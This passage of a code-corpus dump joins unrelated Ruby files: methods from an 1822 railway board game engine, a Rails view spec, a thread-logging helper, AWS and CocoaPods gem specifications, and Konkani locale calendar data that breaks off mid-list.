token_count += 1 if stop.tokens.any? { |t| t == home_token || t == destination_token }
end
# Both hometoken and destination token must be in the route to get the destination bonus
return nil unless token_count == 2
{ route: route, revenue: destination_token.city.route_revenue(route.phase, route.train) }
end
def player_loan_interest(loan)
(loan * 0.5).ceil
end
def company_ability_extra_track?(company)
company.id == self.class::COMPANY_LSR
end
def company_choices(company)
if company.id != self.class::COMPANY_EGR ||
(company.id == self.class::COMPANY_EGR && !company.all_abilities.empty?)
return {}
end
choices = {}
choices['token'] = 'Receive a discount token that can be used to pay the full cost of a single '\
'track tile lay on a rough terrain, hill or mountain hex.'
choices['discount'] = 'Receive a £20 continuous discount off the cost of all hill and mountain terrain '\
'(i.e. NOT off the cost of rough terrain).'
choices
end
def company_made_choice(company, choice)
if company.id != self.class::COMPANY_EGR ||
(company.id == self.class::COMPANY_EGR && !company.all_abilities.empty?)
return
end
company.desc = company_choices(company)[choice]
if choice == 'token'
# Give the company a free tile lay.
ability = Engine::Ability::TileLay.new(type: 'tile_lay', tiles: [], hexes: [], owner_type: 'corporation',
count: 1, closed_when_used_up: true, reachable: true, free: true,
special: false, when: 'track')
company.add_ability(ability)
else
%w[mountain hill].each do |terrain|
ability = Engine::Ability::TileDiscount.new(type: 'tile_discount', discount: 20, terrain: terrain)
company.add_ability(ability)
end
end
end
def destination_bonus(routes)
return nil if routes.empty?
# If multiple routes gets destination bonus, get the biggest one. If we got E trains
# this is bigger then normal train.
destination_bonus = routes.map { |r| calculate_destination_bonus(r) }.compact
destination_bonus.sort_by { |v| v[:revenue] }.reverse&.first
end
def english_channel_visit(visits)
visits.count { |v| v.hex.name == self.class::ENGLISH_CHANNEL_HEX || v.hex.name == self.class::FRANCE_HEX }
end
def exchange_tokens(entity)
ability = entity.all_abilities.find { |a| a.type == :exchange_token }
return 0 unless ability
ability.count
end
def extra_train?(train)
self.class::EXTRA_TRAINS.include?(train.name)
end
def find_corporation(company)
corporation_id = company.id[1..-1]
corporation_by_id(corporation_id)
end
def init_bidding_token
self.class::BIDDING_TOKENS[@players.size.to_s]
end
def london_extra_token_ability
Engine::Ability::Token.new(type: 'token', hexes: [], price: 20, cheater: 1)
end
def mail_contract_bonus(entity, routes)
mail_contracts = entity.companies.count { |c| self.class::PRIVATE_MAIL_CONTRACTS.include?(c.id) }
return [] unless mail_contracts.positive?
mail_bonuses = routes.map do |r|
stops = r.visited_stops
next if stops.size < 2
first = stops.first.route_base_revenue(r.phase, r.train) / 2
last = stops.last.route_base_revenue(r.phase, r.train) / 2
{ route: r, subsidy: first + last }
end.compact
mail_bonuses.sort_by { |v| v[:subsidy] }.reverse.take(mail_contracts)
end
def move_exchange_token(entity)
remove_exchange_token(entity)
entity.tokens << Engine::Token.new(entity, price: self.class::TOKEN_PRICE)
end
def on_aqcuired_remove_revenue(company)
company.revenue = 0
end
def on_acquired_train(company, entity)
train = @company_trains[company.id]
unless can_gain_extra_train?(entity, train)
raise GameError, "Can't gain an extra #{train.name}, already have one"
end
buy_train(entity, train, :free)
@log << "#{entity.name} gains a #{train.name} train"
# Company closes after it is flipped into a train
company.close!
@log << "#{company.name} closes"
end
def payoff_player_loan(player)
# Remove the loan money from the player. The money from loans is outside money, doesnt count towards
# the normal bank money.
player.cash -= @player_debts[player]
@player_debts[player] = 0
end
def place_destination_token(entity, hex, token)
city = hex.tile.cities.first
city.place_token(entity, token, free: true, check_tokenable: false, cheater: 0)
hex.tile.icons.reject! { |icon| icon.name == "#{entity.id}_destination" }
ability = entity.all_abilities.find { |a| a.type == :destination }
entity.remove_ability(ability)
@graph.clear
@log << "#{entity.name} places its destination token on #{hex.name}"
end
def player_debt(player)
@player_debts[player] || 0
end
def pullman_train?(train)
train.name == self.class::EXTRA_TRAIN_PULLMAN
end
def reduced_bundle_price_for_market_drop(bundle)
directions = (1..bundle.num_shares).map { |_| :up }
bundle.share_price = @stock_market.find_share_price(bundle.corporation, directions).price
bundle
end
def setup_bidboxes
# Set the owner to bank for the companies up for auction this stockround
bidbox_minors.each do |minor|
minor.owner = @bank
end
bidbox_concessions.each do |concessions|
concessions.owner = @bank
end
bidbox_privates.each do |company|
company.owner = @bank
end
end
def remove_exchange_token(entity)
ability = entity.all_abilities.find { |a| a.type == :exchange_token }
ability.use!
ability.description = "Exchange tokens: #{ability.count}"
end
def take_player_loan(player, loan)
# Give the player the money. The money for loans is outside money, doesnt count towards the normal bank money.
player.cash += loan
# Add interest to the loan, must atleast pay 150% of the loaned value
@player_debts[player] += player_loan_interest(loan)
end
def train_type(train)
train.name == 'E' ? :etrain : :normal
end
def upgrade_france_to_brown
france_tile = Engine::Tile.from_code(self.class::FRANCE_HEX, :gray, self.class::FRANCE_HEX_BROWN_TILE)
france_tile.location_name = 'France'
hex_by_id(self.class::FRANCE_HEX).tile = france_tile
end
def upgrade_london(hex)
return unless @london_extra_city_index
extra_city = hex.tile.cities[@london_extra_city_index]
return unless extra_city.tokens.one?
extra_city.tokens[extra_city.normal_slots] = nil
end
private
def find_and_remove_train_by_id(train_id, buyable: true)
train = train_by_id(train_id)
@depot.remove_train(train)
train.buyable = buyable
train
end
def setup_companies
# Randomize from preset seed to get same order
@companies.sort_by! { rand }
minors = @companies.select { |c| c.id[0] == self.class::COMPANY_MINOR_PREFIX }
concessions = @companies.select { |c| c.id[0] == self.class::COMPANY_CONCESSION_PREFIX }
privates = @companies.select { |c| c.id[0] == self.class::COMPANY_PRIVATE_PREFIX }
# Always set the P1, C1 and M24 in the first biddingbox
m24 = minors.find { |c| c.id == 'M24' }
minors.delete(m24)
minors.unshift(m24)
c1 = concessions.find { |c| c.id == 'C1' }
concessions.delete(c1)
concessions.unshift(c1)
p1 = privates.find { |c| c.id == 'P1' }
privates.delete(p1)
privates.unshift(p1)
# Clear and add the companies in the correct randomize order sorted by type
@companies.clear
@companies.concat(minors)
@companies.concat(concessions)
@companies.concat(privates)
# Set the min bid on the Concessions and Minors
@companies.each do |c|
case c.id[0]
when self.class::COMPANY_CONCESSION_PREFIX, self.class::COMPANY_MINOR_PREFIX
c.min_price = c.value
else
c.min_price = 0
end
c.max_price = 10_000
end
# Setup company abilities
@company_trains = {}
@company_trains['P3'] = find_and_remove_train_by_id('2P-0', buyable: false)
@company_trains['P4'] = find_and_remove_train_by_id('2P-1', buyable: false)
@company_trains['P1'] = find_and_remove_train_by_id('5P-0')
@company_trains['P13'] = find_and_remove_train_by_id('P+-0', buyable: false)
@company_trains['P14'] = find_and_remove_train_by_id('P+-1', buyable: false)
# Setup the minor 14 ability
corporation_by_id(self.class::MINOR_14_ID).add_ability(london_extra_token_ability)
end
def setup_destinations
self.class::DESTINATIONS.each do |corp, destination|
description = if corp == 'LNWR'
"Gets destination token at #{destination} when floated."
else
"Connect to #{destination} for your destination token."
end
ability = Ability::Base.new(
type: 'destination',
description: description
)
corporation = corporation_by_id(corp)
corporation.add_ability(ability)
corporation.tokens << Engine::Token.new(corporation, logo: "/logos/1822/#{corp}_DEST.svg",
type: :destination)
hex_by_id(destination).tile.icons << Part::Icon.new("../icons/1822/#{corp}_DEST", "#{corp}_destination")
end
end
def setup_exchange_tokens
self.class::EXCHANGE_TOKENS.each do |corp, token_count|
ability = Ability::Base.new(
type: 'exchange_token',
description: "Exchange tokens: #{token_count}",
count: token_count
)
corporation = corporation_by_id(corp)
corporation.add_ability(ability)
end
end
end
end
end
end
| 36.814592 | 120 | 0.491718 |
ab4c811c22b1c9377f687cbaed1d825f045ffce3 | 420 | require 'spec_helper'
describe "categories/show" do
before(:each) do
@category = assign(:category, stub_model(Category,
:name => "Name",
:description => "Description"
))
end
it "renders attributes in <p>" do
render
# Run the generator again with the --webrat flag if you want to use webrat matchers
rendered.should match(/Name/)
rendered.should match(/Description/)
end
end
| 23.333333 | 87 | 0.669048 |
4ac5313655acb17f464369cacf09ea14d005fba7 | 96 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'speedtest'
require 'byebug'
| 24 | 58 | 0.739583 |
2143580ed88117032f78018a3ea8e42f60031c4b | 1,639 | # frozen_string_literal: true
require 'thread'
require_relative 'logger'
module Listen
module Thread
class << self
# Creates a new thread with the given name.
# Any exceptions raised by the thread will be logged with the thread name and complete backtrace.
# rubocop:disable Style/MultilineBlockChain
def new(name, &block)
thread_name = "listen-#{name}"
caller_stack = caller
::Thread.new do
rescue_and_log(thread_name, caller_stack: caller_stack, &block)
end.tap do |thread|
thread.name = thread_name
end
end
# rubocop:enable Style/MultilineBlockChain
def rescue_and_log(method_name, *args, caller_stack: nil)
yield(*args)
rescue Exception => exception # rubocop:disable Lint/RescueException
_log_exception(exception, method_name, caller_stack: caller_stack)
end
private
def _log_exception(exception, thread_name, caller_stack: nil)
complete_backtrace = if caller_stack
[*exception.backtrace, "--- Thread.new ---", *caller_stack]
else
exception.backtrace
end
message = "Exception rescued in #{thread_name}:\n#{_exception_with_causes(exception)}\n#{complete_backtrace * "\n"}"
Listen.logger.error(message)
end
def _exception_with_causes(exception)
result = +"#{exception.class}: #{exception}"
if exception.cause
result << "\n"
result << "--- Caused by: ---\n"
result << _exception_with_causes(exception.cause)
end
result
end
end
end
end
| 29.8 | 124 | 0.639414 |
79fb343a31d918c8c3d4dcb760d6ed09f3ead920 | 1,165 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-kinesisvideo'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Kinesis Video'
spec.description = 'Official AWS Ruby gem for Amazon Kinesis Video Streams (Kinesis Video). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'http://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-kinesisvideo',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-kinesisvideo/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3')
spec.add_dependency('aws-sigv4', '~> 1.0')
end
| 38.833333 | 138 | 0.671245 |
0809b8ead45d5c74ae901f026a6152fcf7025efd | 271 | module ApplicationHelper
#Returns the full title on a per-page basis.
def full_title(page_title = '')
base_title = "Ruby on Rails Tutorial Sample App"
if page_title.empty?
base_title
else
page_title + " | " + base_title
end
end
end
| 20.846154 | 52 | 0.656827 |
ac87df517bc1089c8afd86a41099768c1591b678 | 1,235 | #
# Be sure to run `pod lib lint TMDBSwift.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "TMDBSwift"
s.version = "0.5.1"
s.summary = "Swift wrapper for themoviedb.org api v3"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "Wrapper for themoviedb.org api v.3 written in Swift"
s.homepage = "https://github.com/gkye/TheMovieDatabaseSwiftWrapper"
s.license = 'MIT'
s.author = { "George Kye" => "[email protected]" }
s.source = { :git => "https://github.com/gkye/TheMovieDatabaseSwiftWrapper.git", :tag => s.version.to_s }
s.social_media_url = 'https://twitter.com/kyegeorge'
s.ios.deployment_target = '8.0'
s.source_files = 'Sources/**/*'
end
| 37.424242 | 117 | 0.663158 |
bf3ddfdeceea9a943db4c02976e6f547ef15539d | 159 | # Load the rails application
require File.expand_path('../application', __FILE__)
# Initialize the rails application
AuthyDeviseDemo::Application.initialize!
| 26.5 | 52 | 0.811321 |
79fd7aa23687a7cfeaaa883cef377b68eced32b0 | 655 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# GRPC contains the General RPC module.
module GRPC
VERSION = '1.26.0'
end
| 34.473684 | 74 | 0.755725 |
e920530c41f279ff70e0c7be09909cfa91b1812c | 24,028 | #
# a language data file for Ruby/CLDR
#
# Generated by: CLDR::Generator
#
# CLDR version: 1.3
#
# Original file name: common/main/kok_IN.xml
# Original file revision: 1.31 $
#
# Copyright (C) 2006 Masao Mutoh
#
# This file is distributed under the same license as the Ruby/CLDR.
#
private
def init_data
@localized_pattern_characters = "GyMdkHmsSEDFwWahKzYeugAZ"
@default = "gregorian"
@months = {}
@months[:gregorian] = {}
@months[:gregorian][:abbreviated] = {}
@months[:gregorian][:abbreviated]["1"] = "जानेवारी"
@months[:gregorian][:abbreviated]["10"] = "ओक्टोबर"
@months[:gregorian][:abbreviated]["11"] = "नोव्हेंबर"
@months[:gregorian][:abbreviated]["12"] = "डिसेंबर"
@months[:gregorian][:abbreviated]["2"] = "फेबृवारी"
@months[:gregorian][:abbreviated]["3"] = "मार्च"
@months[:gregorian][:abbreviated]["4"] = "एप्रिल"
@months[:gregorian][:abbreviated]["5"] = "मे"
@months[:gregorian][:abbreviated]["6"] = "जून"
@months[:gregorian][:abbreviated]["7"] = "जुलै"
@months[:gregorian][:abbreviated]["8"] = "ओगस्ट"
@months[:gregorian][:abbreviated]["9"] = "सेप्टेंबर"
@months[:gregorian][:narrow] = {}
@months[:gregorian][:narrow]["1"] = "1"
@months[:gregorian][:narrow]["10"] = "10"
@months[:gregorian][:narrow]["11"] = "11"
@months[:gregorian][:narrow]["12"] = "12"
@months[:gregorian][:narrow]["2"] = "2"
@months[:gregorian][:narrow]["3"] = "3"
@months[:gregorian][:narrow]["4"] = "4"
@months[:gregorian][:narrow]["5"] = "5"
@months[:gregorian][:narrow]["6"] = "6"
@months[:gregorian][:narrow]["7"] = "7"
@months[:gregorian][:narrow]["8"] = "8"
@months[:gregorian][:narrow]["9"] = "9"
@months[:gregorian][:wide] = {}
@months[:gregorian][:wide]["1"] = "जानेवारी"
@months[:gregorian][:wide]["10"] = "ओक्टोबर"
@months[:gregorian][:wide]["11"] = "नोव्हेंबर"
@months[:gregorian][:wide]["12"] = "डिसेंबर"
@months[:gregorian][:wide]["2"] = "फेब्रुवारी"
@months[:gregorian][:wide]["3"] = "मार्च"
@months[:gregorian][:wide]["4"] = "एप्रिल"
@months[:gregorian][:wide]["5"] = "मे"
@months[:gregorian][:wide]["6"] = "जून"
@months[:gregorian][:wide]["7"] = "जुलै"
@months[:gregorian][:wide]["8"] = "ओगस्ट"
@months[:gregorian][:wide]["9"] = "सेप्टेंबर"
@months[:hebrew] = {}
@months[:hebrew][:abbreviated] = {}
@months[:hebrew][:abbreviated]["1"] = "Tishri"
@months[:hebrew][:abbreviated]["10"] = "Sivan"
@months[:hebrew][:abbreviated]["11"] = "Tamuz"
@months[:hebrew][:abbreviated]["12"] = "Av"
@months[:hebrew][:abbreviated]["13"] = "Elul"
@months[:hebrew][:abbreviated]["2"] = "Heshvan"
@months[:hebrew][:abbreviated]["3"] = "Kislev"
@months[:hebrew][:abbreviated]["4"] = "Tevet"
@months[:hebrew][:abbreviated]["5"] = "Shevat"
@months[:hebrew][:abbreviated]["6"] = "Adar I"
@months[:hebrew][:abbreviated]["7"] = "Adar"
@months[:hebrew][:abbreviated]["8"] = "Nisan"
@months[:hebrew][:abbreviated]["9"] = "Iyar"
@months[:hebrew][:wide] = {}
@months[:hebrew][:wide]["1"] = "Tishri"
@months[:hebrew][:wide]["10"] = "Sivan"
@months[:hebrew][:wide]["11"] = "Tamuz"
@months[:hebrew][:wide]["12"] = "Av"
@months[:hebrew][:wide]["13"] = "Elul"
@months[:hebrew][:wide]["2"] = "Heshvan"
@months[:hebrew][:wide]["3"] = "Kislev"
@months[:hebrew][:wide]["4"] = "Tevet"
@months[:hebrew][:wide]["5"] = "Shevat"
@months[:hebrew][:wide]["6"] = "Adar I"
@months[:hebrew][:wide]["7"] = "Adar"
@months[:hebrew][:wide]["8"] = "Nisan"
@months[:hebrew][:wide]["9"] = "Iyar"
@months[:islamic_civil] = {}
@months[:islamic_civil][:abbreviated] = {}
@months[:islamic_civil][:abbreviated]["1"] = "Muharram"
@months[:islamic_civil][:abbreviated]["10"] = "Shawwal"
@months[:islamic_civil][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:abbreviated]["2"] = "Safar"
@months[:islamic_civil][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic_civil][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic_civil][:abbreviated]["5"] = "Jumada I"
@months[:islamic_civil][:abbreviated]["6"] = "Jumada II"
@months[:islamic_civil][:abbreviated]["7"] = "Rajab"
@months[:islamic_civil][:abbreviated]["8"] = "Shaʻban"
@months[:islamic_civil][:abbreviated]["9"] = "Ramadan"
@months[:islamic_civil][:wide] = {}
@months[:islamic_civil][:wide]["1"] = "Muharram"
@months[:islamic_civil][:wide]["10"] = "Shawwal"
@months[:islamic_civil][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic_civil][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic_civil][:wide]["2"] = "Safar"
@months[:islamic_civil][:wide]["3"] = "Rabiʻ I"
@months[:islamic_civil][:wide]["4"] = "Rabiʻ II"
@months[:islamic_civil][:wide]["5"] = "Jumada I"
@months[:islamic_civil][:wide]["6"] = "Jumada II"
@months[:islamic_civil][:wide]["7"] = "Rajab"
@months[:islamic_civil][:wide]["8"] = "Shaʻban"
@months[:islamic_civil][:wide]["9"] = "Ramadan"
@months[:islamic] = {}
@months[:islamic][:abbreviated] = {}
@months[:islamic][:abbreviated]["1"] = "Muharram"
@months[:islamic][:abbreviated]["10"] = "Shawwal"
@months[:islamic][:abbreviated]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:abbreviated]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:abbreviated]["2"] = "Safar"
@months[:islamic][:abbreviated]["3"] = "Rabiʻ I"
@months[:islamic][:abbreviated]["4"] = "Rabiʻ II"
@months[:islamic][:abbreviated]["5"] = "Jumada I"
@months[:islamic][:abbreviated]["6"] = "Jumada II"
@months[:islamic][:abbreviated]["7"] = "Rajab"
@months[:islamic][:abbreviated]["8"] = "Shaʻban"
@months[:islamic][:abbreviated]["9"] = "Ramadan"
@months[:islamic][:wide] = {}
@months[:islamic][:wide]["1"] = "Muharram"
@months[:islamic][:wide]["10"] = "Shawwal"
@months[:islamic][:wide]["11"] = "Dhuʻl-Qiʻdah"
@months[:islamic][:wide]["12"] = "Dhuʻl-Hijjah"
@months[:islamic][:wide]["2"] = "Safar"
@months[:islamic][:wide]["3"] = "Rabiʻ I"
@months[:islamic][:wide]["4"] = "Rabiʻ II"
@months[:islamic][:wide]["5"] = "Jumada I"
@months[:islamic][:wide]["6"] = "Jumada II"
@months[:islamic][:wide]["7"] = "Rajab"
@months[:islamic][:wide]["8"] = "Shaʻban"
@months[:islamic][:wide]["9"] = "Ramadan"
@months[:persian] = {}
@months[:persian][:abbreviated] = {}
@months[:persian][:abbreviated]["1"] = "Farvardin"
@months[:persian][:abbreviated]["10"] = "Dey"
@months[:persian][:abbreviated]["11"] = "Bahman"
@months[:persian][:abbreviated]["12"] = "Esfand"
@months[:persian][:abbreviated]["2"] = "Ordibehesht"
@months[:persian][:abbreviated]["3"] = "Khordad"
@months[:persian][:abbreviated]["4"] = "Tir"
@months[:persian][:abbreviated]["5"] = "Mordad"
@months[:persian][:abbreviated]["6"] = "Shahrivar"
@months[:persian][:abbreviated]["7"] = "Mehr"
@months[:persian][:abbreviated]["8"] = "Aban"
@months[:persian][:abbreviated]["9"] = "Azar"
@months[:persian][:wide] = {}
@months[:persian][:wide]["1"] = "Farvardin"
@months[:persian][:wide]["10"] = "Dey"
@months[:persian][:wide]["11"] = "Bahman"
@months[:persian][:wide]["12"] = "Esfand"
@months[:persian][:wide]["2"] = "Ordibehesht"
@months[:persian][:wide]["3"] = "Khordad"
@months[:persian][:wide]["4"] = "Tir"
@months[:persian][:wide]["5"] = "Mordad"
@months[:persian][:wide]["6"] = "Shahrivar"
@months[:persian][:wide]["7"] = "Mehr"
@months[:persian][:wide]["8"] = "Aban"
@months[:persian][:wide]["9"] = "Azar"
@monthformat_defaults = {}
@monthformat_defaults["gregorian"] = "wide"
@monthformat_defaults["hebrew"] = "wide"
@monthformat_defaults["islamic"] = "wide"
@monthformat_defaults["islamic-civil"] = "wide"
@monthformat_defaults["persian"] = "wide"
@days = {}
@days[:gregorian] = {}
@days[:gregorian][:abbreviated] = {}
@days[:gregorian][:abbreviated]["fri"] = "शुक्र"
@days[:gregorian][:abbreviated]["mon"] = "सोम"
@days[:gregorian][:abbreviated]["sat"] = "शनि"
@days[:gregorian][:abbreviated]["sun"] = "रवि"
@days[:gregorian][:abbreviated]["thu"] = "गुरु"
@days[:gregorian][:abbreviated]["tue"] = "मंगळ"
@days[:gregorian][:abbreviated]["wed"] = "बुध"
@days[:gregorian][:narrow] = {}
@days[:gregorian][:narrow]["fri"] = "6"
@days[:gregorian][:narrow]["mon"] = "2"
@days[:gregorian][:narrow]["sat"] = "7"
@days[:gregorian][:narrow]["sun"] = "1"
@days[:gregorian][:narrow]["thu"] = "5"
@days[:gregorian][:narrow]["tue"] = "3"
@days[:gregorian][:narrow]["wed"] = "4"
@days[:gregorian][:wide] = {}
@days[:gregorian][:wide]["fri"] = "शुक्रवार"
@days[:gregorian][:wide]["mon"] = "सोमवार"
@days[:gregorian][:wide]["sat"] = "शनिवार"
@days[:gregorian][:wide]["sun"] = "आदित्यवार"
@days[:gregorian][:wide]["thu"] = "गुरुवार"
@days[:gregorian][:wide]["tue"] = "मंगळार"
@days[:gregorian][:wide]["wed"] = "बुधवार"
@dayformat_defaults = {}
@dayformat_defaults["gregorian"] = "wide"
@week_firstdays = {}
@week_firstdays["gregorian"] = "mon"
@weekend_starts = {}
@weekend_starts["gregorian"] = "sun"
@weekend_ends = {}
@weekend_ends["gregorian"] = "sun"
@mindays = {}
@mindays["gregorian"] = "1"
@am = {}
@am["gregorian"] = "म.पू."
@pm = {}
@pm["gregorian"] = "म.नं."
@era_names = {}
@era_abbrs = {}
@era_abbrs[:buddhist] = {}
@era_abbrs[:buddhist]["0"] = "BE"
@era_abbrs[:gregorian] = {}
@era_abbrs[:gregorian]["0"] = "क्रिस्तपूर्व"
@era_abbrs[:gregorian]["1"] = "क्रिस्तशखा"
@era_abbrs[:hebrew] = {}
@era_abbrs[:hebrew]["0"] = "AM"
@era_abbrs[:islamic_civil] = {}
@era_abbrs[:islamic_civil]["0"] = "AH"
@era_abbrs[:islamic] = {}
@era_abbrs[:islamic]["0"] = "AH"
@era_abbrs[:japanese] = {}
@era_abbrs[:japanese]["0"] = "Taika"
@era_abbrs[:japanese]["1"] = "Hakuchi"
@era_abbrs[:japanese]["10"] = "Tempyō"
@era_abbrs[:japanese]["100"] = "Kaō"
@era_abbrs[:japanese]["101"] = "Shōan"
@era_abbrs[:japanese]["102"] = "Angen"
@era_abbrs[:japanese]["103"] = "Jishō"
@era_abbrs[:japanese]["104"] = "Yōwa"
@era_abbrs[:japanese]["105"] = "Juei"
@era_abbrs[:japanese]["106"] = "Genryuku"
@era_abbrs[:japanese]["107"] = "Bunji"
@era_abbrs[:japanese]["108"] = "Kenkyū"
@era_abbrs[:japanese]["109"] = "Shōji"
@era_abbrs[:japanese]["11"] = "Tempyō-kampō"
@era_abbrs[:japanese]["110"] = "Kennin"
@era_abbrs[:japanese]["111"] = "Genkyū"
@era_abbrs[:japanese]["112"] = "Ken-ei"
@era_abbrs[:japanese]["113"] = "Shōgen"
@era_abbrs[:japanese]["114"] = "Kenryaku"
@era_abbrs[:japanese]["115"] = "Kenpō"
@era_abbrs[:japanese]["116"] = "Shōkyū"
@era_abbrs[:japanese]["117"] = "Jōō"
@era_abbrs[:japanese]["118"] = "Gennin"
@era_abbrs[:japanese]["119"] = "Karoku"
@era_abbrs[:japanese]["12"] = "Tempyō-shōhō"
@era_abbrs[:japanese]["120"] = "Antei"
@era_abbrs[:japanese]["121"] = "Kanki"
@era_abbrs[:japanese]["122"] = "Jōei"
@era_abbrs[:japanese]["123"] = "Tempuku"
@era_abbrs[:japanese]["124"] = "Bunryaku"
@era_abbrs[:japanese]["125"] = "Katei"
@era_abbrs[:japanese]["126"] = "Ryakunin"
@era_abbrs[:japanese]["127"] = "En-ō"
@era_abbrs[:japanese]["128"] = "Ninji"
@era_abbrs[:japanese]["129"] = "Kangen"
@era_abbrs[:japanese]["13"] = "Tempyō-hōji"
@era_abbrs[:japanese]["130"] = "Hōji"
@era_abbrs[:japanese]["131"] = "Kenchō"
@era_abbrs[:japanese]["132"] = "Kōgen"
@era_abbrs[:japanese]["133"] = "Shōka"
@era_abbrs[:japanese]["134"] = "Shōgen"
@era_abbrs[:japanese]["135"] = "Bun-ō"
@era_abbrs[:japanese]["136"] = "Kōchō"
@era_abbrs[:japanese]["137"] = "Bun-ei"
@era_abbrs[:japanese]["138"] = "Kenji"
@era_abbrs[:japanese]["139"] = "Kōan"
@era_abbrs[:japanese]["14"] = "Temphō-jingo"
@era_abbrs[:japanese]["140"] = "Shōō"
@era_abbrs[:japanese]["141"] = "Einin"
@era_abbrs[:japanese]["142"] = "Shōan"
@era_abbrs[:japanese]["143"] = "Kengen"
@era_abbrs[:japanese]["144"] = "Kagen"
@era_abbrs[:japanese]["145"] = "Tokuji"
@era_abbrs[:japanese]["146"] = "Enkei"
@era_abbrs[:japanese]["147"] = "Ōchō"
@era_abbrs[:japanese]["148"] = "Shōwa"
@era_abbrs[:japanese]["149"] = "Bunpō"
@era_abbrs[:japanese]["15"] = "Jingo-keiun"
@era_abbrs[:japanese]["150"] = "Genō"
@era_abbrs[:japanese]["151"] = "Genkyō"
@era_abbrs[:japanese]["152"] = "Shōchū"
@era_abbrs[:japanese]["153"] = "Kareki"
@era_abbrs[:japanese]["154"] = "Gentoku"
@era_abbrs[:japanese]["155"] = "Genkō"
@era_abbrs[:japanese]["156"] = "Kemmu"
@era_abbrs[:japanese]["157"] = "Engen"
@era_abbrs[:japanese]["158"] = "Kōkoku"
@era_abbrs[:japanese]["159"] = "Shōhei"
@era_abbrs[:japanese]["16"] = "Hōki"
@era_abbrs[:japanese]["160"] = "Kentoku"
@era_abbrs[:japanese]["161"] = "Bunchũ"
@era_abbrs[:japanese]["162"] = "Tenju"
@era_abbrs[:japanese]["163"] = "Kōryaku"
@era_abbrs[:japanese]["164"] = "Kōwa"
@era_abbrs[:japanese]["165"] = "Genchũ"
@era_abbrs[:japanese]["166"] = "Meitoku"
@era_abbrs[:japanese]["167"] = "Kakei"
@era_abbrs[:japanese]["168"] = "Kōō"
@era_abbrs[:japanese]["169"] = "Meitoku"
@era_abbrs[:japanese]["17"] = "Ten-ō"
@era_abbrs[:japanese]["170"] = "Ōei"
@era_abbrs[:japanese]["171"] = "Shōchō"
@era_abbrs[:japanese]["172"] = "Eikyō"
@era_abbrs[:japanese]["173"] = "Kakitsu"
@era_abbrs[:japanese]["174"] = "Bun-an"
@era_abbrs[:japanese]["175"] = "Hōtoku"
@era_abbrs[:japanese]["176"] = "Kyōtoku"
@era_abbrs[:japanese]["177"] = "Kōshō"
@era_abbrs[:japanese]["178"] = "Chōroku"
@era_abbrs[:japanese]["179"] = "Kanshō"
@era_abbrs[:japanese]["18"] = "Enryaku"
@era_abbrs[:japanese]["180"] = "Bunshō"
@era_abbrs[:japanese]["181"] = "Ōnin"
@era_abbrs[:japanese]["182"] = "Bunmei"
@era_abbrs[:japanese]["183"] = "Chōkyō"
@era_abbrs[:japanese]["184"] = "Entoku"
@era_abbrs[:japanese]["185"] = "Meiō"
@era_abbrs[:japanese]["186"] = "Bunki"
@era_abbrs[:japanese]["187"] = "Eishō"
@era_abbrs[:japanese]["188"] = "Taiei"
@era_abbrs[:japanese]["189"] = "Kyōroku"
@era_abbrs[:japanese]["19"] = "Daidō"
@era_abbrs[:japanese]["190"] = "Tenmon"
@era_abbrs[:japanese]["191"] = "Kōji"
@era_abbrs[:japanese]["192"] = "Eiroku"
@era_abbrs[:japanese]["193"] = "Genki"
@era_abbrs[:japanese]["194"] = "Tenshō"
@era_abbrs[:japanese]["195"] = "Bunroku"
@era_abbrs[:japanese]["196"] = "Keichō"
@era_abbrs[:japanese]["197"] = "Genwa"
@era_abbrs[:japanese]["198"] = "Kan-ei"
@era_abbrs[:japanese]["199"] = "Shōho"
@era_abbrs[:japanese]["2"] = "Hakuhō"
@era_abbrs[:japanese]["20"] = "Kōnin"
@era_abbrs[:japanese]["200"] = "Keian"
@era_abbrs[:japanese]["201"] = "Shōō"
@era_abbrs[:japanese]["202"] = "Meiryaku"
@era_abbrs[:japanese]["203"] = "Manji"
@era_abbrs[:japanese]["204"] = "Kanbun"
@era_abbrs[:japanese]["205"] = "Enpō"
@era_abbrs[:japanese]["206"] = "Tenwa"
@era_abbrs[:japanese]["207"] = "Jōkyō"
@era_abbrs[:japanese]["208"] = "Genroku"
@era_abbrs[:japanese]["209"] = "Hōei"
@era_abbrs[:japanese]["21"] = "Tenchō"
@era_abbrs[:japanese]["210"] = "Shōtoku"
